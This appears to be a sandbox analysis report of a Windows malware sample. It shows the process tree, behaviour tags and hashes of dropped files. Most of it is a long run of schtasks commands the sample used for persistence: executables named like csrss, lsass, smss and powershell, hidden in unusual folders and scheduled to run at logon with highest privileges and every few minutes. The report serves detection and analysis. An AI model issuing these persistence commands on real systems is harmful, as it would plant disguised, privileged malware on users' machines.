                                                                                                                                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\csrss.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4664
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\csrss.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2640
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\providerWebFont\backgroundTaskHost.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:728
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\providerWebFont\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3428
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\providerWebFont\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:3584
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\RuntimeBroker.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3188
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\mswebFonthost\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3104
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\mswebFonthost\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4440
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\sppsvc.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1764
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Google\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4516
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2752
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Saved Games\backgroundTaskHost.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4964
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1520
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Saved Games\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2524
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1764
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5340
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5700
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\conhost.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:5296
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3704
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5376
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Surrogateprovidercomponentsessionmonitor\smss.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5464
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Surrogateprovidercomponentsessionmonitor\smss.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5592
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Surrogateprovidercomponentsessionmonitor\smss.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5712
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\mswebFonthost\lsass.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5652
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\mswebFonthost\lsass.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5704
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\mswebFonthost\lsass.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4472
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\mswebFonthost\sysmon.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:5956
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\mswebFonthost\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5964
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:5728
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\SearchApp.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3212
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\mswebFonthost\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:6140
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\mswebFonthost\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5440
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5248
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5532
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5568
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0422\powershell.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5300
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\Help\mui\0422\powershell.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5760
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0422\powershell.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5732
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 6 /tr "'C:\providerWebFont\MsPortserver.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5548
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\powershell.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5624
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5620
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\powershell.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3840
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "MsPortserver" /sc ONLOGON /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5780
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4472
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:6016
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 14 /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:6104
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5724
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\providerWebFont\SppExtComObj.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2912
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\providerWebFont\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4964
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\providerWebFont\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:2692
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\System.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5728
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\System.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4068
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\System.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:3448
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "NeoN" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\Neo.exe'" /f
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1996
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "Neo" /sc ONLOGON /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1956
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks.exe /create /tn "NeoN" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f
                                                                                                                                            1⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:5104
                                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:1312
                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:4844
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\Idle.exe'" /f
                                                                                                                                                1⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:5220
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                1⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:2704
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                1⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:1644
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "RuntimeBroker.exeR" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe.exe'" /f
                                                                                                                                                1⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:5968
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "RuntimeBroker.exe" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe.exe'" /rl HIGHEST /f
                                                                                                                                                1⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:844
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks.exe /create /tn "RuntimeBroker.exeR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe.exe'" /rl HIGHEST /f
                                                                                                                                                1⤵
                                                                                                                                                  PID:4356
                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1948
                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4916
                                                                                                                                                    • C:\Recovery\WindowsRE\sppsvc.exe
                                                                                                                                                      C:\Recovery\WindowsRE\sppsvc.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:6996
                                                                                                                                                      • C:\Recovery\WindowsRE\sppsvc.exe.exe
                                                                                                                                                        "C:\Recovery\WindowsRE\sppsvc.exe.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:7064
                                                                                                                                                      • C:\Users\Admin\AppData\Local\System.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\System.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:7072
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Idle.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Idle.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:3660
                                                                                                                                                        • C:\Users\Admin\AppData\Local\System.exe.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\System.exe.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1744
                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:6532

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Config.Msi\e5754ba.rbs

                                                                                                                                                      Filesize

                                                                                                                                                      1.0MB

                                                                                                                                                      MD5

                                                                                                                                                      2561a4246cdc44897a725936d090334d

                                                                                                                                                      SHA1

                                                                                                                                                      56ad5404655d7269126114b7342d71769f22e741

                                                                                                                                                      SHA256

                                                                                                                                                      d3ab0476e67b1b9b7a458ed57c765f33d7cede5a694caa7e312d50577ef4925f

                                                                                                                                                      SHA512

                                                                                                                                                      8df7c5ed8b8437f61cf88da52e54f9fbe427664de7f1d40ff586136c2dbe1ea9c500df040e1997f5f62d06e9555fcd0b6f15854197b49ae0b916df3c4139091d

                                                                                                                                                    • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                      MD5

                                                                                                                                                      d3bc164e23e694c644e0b1ce3e3f9910

                                                                                                                                                      SHA1

                                                                                                                                                      1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                                                                                                                      SHA256

                                                                                                                                                      1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                                                                                                                      SHA512

                                                                                                                                                      91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                      Filesize

                                                                                                                                                      818B

                                                                                                                                                      MD5

                                                                                                                                                      2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                      SHA1

                                                                                                                                                      c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                      SHA256

                                                                                                                                                      733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                      SHA512

                                                                                                                                                      508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                      SHA1

                                                                                                                                                      01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                      SHA256

                                                                                                                                                      67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                      SHA512

                                                                                                                                                      7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                      Filesize

                                                                                                                                                      754B

                                                                                                                                                      MD5

                                                                                                                                                      d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                      SHA1

                                                                                                                                                      58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                      SHA256

                                                                                                                                                      45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                      SHA512

                                                                                                                                                      54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                      Filesize

                                                                                                                                                      771B

                                                                                                                                                      MD5

                                                                                                                                                      e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                      SHA1

                                                                                                                                                      f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                      SHA256

                                                                                                                                                      b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                      SHA512

                                                                                                                                                      8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                      Filesize

                                                                                                                                                      730B

                                                                                                                                                      MD5

                                                                                                                                                      072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                      SHA1

                                                                                                                                                      0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                      SHA256

                                                                                                                                                      2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                      SHA512

